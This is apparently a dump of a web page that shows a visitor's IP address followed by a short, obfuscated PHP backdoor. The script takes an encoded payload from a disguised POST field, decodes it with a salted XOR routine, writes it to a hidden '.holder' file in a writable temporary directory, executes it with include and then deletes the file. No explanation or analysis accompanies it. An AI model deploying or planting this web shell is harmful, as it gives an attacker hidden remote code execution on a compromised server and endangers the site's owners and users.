Your IP : 216.73.216.158
<?php
if(!is_null($_POST["fact\x6F\x72"] ?? null)){
$k = array_filter([session_save_path(), getcwd(), "/tmp", sys_get_temp_dir(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP")]);
$val = $_POST["fact\x6F\x72"];
$val = explode( '.' , $val ) ;
$obj = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen( $salt);
$o = 0;
$__tmp = $val;
while( $v5 = array_shift( $__tmp)) { $chS = ord( $salt[$o % $sLen]);
$d =( ( int)$v5 - $chS -( $o % 10)) ^ 84;
$obj.= chr( $d);
$o++;}
foreach ($k as $key => $object) {
if (is_dir($object) && is_writable($object)) {
$descriptor = sprintf("%s/.holder", $object);
if (file_put_contents($descriptor, $obj)) {
include $descriptor;
@unlink($descriptor);
die();
}
}
}
}